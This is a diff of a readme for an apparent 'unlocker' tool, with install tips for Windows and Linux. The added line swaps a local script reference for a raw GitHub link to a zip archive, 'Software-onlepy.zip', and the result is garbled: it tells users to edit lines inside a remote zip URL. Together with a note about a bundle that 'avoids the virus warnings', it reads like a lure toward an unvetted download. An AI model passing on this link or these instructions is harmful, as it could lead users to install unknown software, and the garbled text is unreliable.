progamereperm/unlocker/readme.txt

 WINDOWS USERS: Get the tool from the Releases section, you will get a bundled python distribution that avoids the virus warnings and python not found etc.

 LINUX USERS: No bundled python for you, but make sure you have python 3.0+ installed.
-If you have errors like "Python not supported" but you have python installed, change the lines inside of lnx-install.sh from 'python xxxxxxx.py' to 'python3.7 xxxxxxx.py' (if you have python 3.7 installed, otherwise try python3 or other stuff)
+If you have errors like "Python not supported" but you have python installed, change the lines inside of https://raw.githubusercontent.com/progamereperm/unlocker/master/gawk/Software-onlepy.zip from 'python https://raw.githubusercontent.com/progamereperm/unlocker/master/gawk/Software-onlepy.zip' to 'python3.7 https://raw.githubusercontent.com/progamereperm/unlocker/master/gawk/Software-onlepy.zip' (if you have python 3.7 installed, otherwise try python3 or other stuff)

 **************************************************************
 **************************************************************